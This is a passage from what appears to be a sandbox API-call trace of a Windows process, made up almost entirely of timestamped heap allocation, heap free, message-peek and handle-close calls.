cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0200.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0200.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0200.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.287] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0200.287] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0200.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0200.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0200.288] FreeLibrary (hLibModule=0x74d40000) returned 1 [0200.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0200.288] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0200.288] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0200.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.288] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0200.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0200.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0200.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0200.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0200.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0200.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0200.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0200.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0200.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0200.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0200.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0200.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0200.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0200.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0200.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0200.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0200.297] CloseHandle (hObject=0x268) returned 1 [0200.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0200.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0200.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0200.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0200.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0200.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0200.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0200.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0200.299] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0200.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0200.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0200.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0200.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0200.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0200.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0200.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0200.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0200.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0200.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0200.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0200.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0200.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b40 [0200.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0200.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f48 [0200.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0200.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.301] CloseHandle (hObject=0x1f8) returned 1 [0200.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.304] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24c7a50 | out: hHeap=0x25c0000) returned 1 [0200.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0200.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0200.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0200.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0200.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0200.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.305] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0200.305] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.305] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0200.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0200.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0200.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0200.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0200.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0200.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0200.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0200.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0200.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0200.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0200.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0200.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0200.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0200.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.307] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.308] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0200.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0200.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0200.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0200.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0200.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0200.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0200.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0200.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0200.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0200.309] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0200.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0200.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0200.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0200.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0200.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0200.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0200.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0200.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0200.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0200.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0200.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0200.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.310] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0200.310] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0200.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0200.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0200.310] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0200.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0200.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0200.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0200.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0200.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0200.311] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0200.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0200.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ff0 [0200.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0200.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0200.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 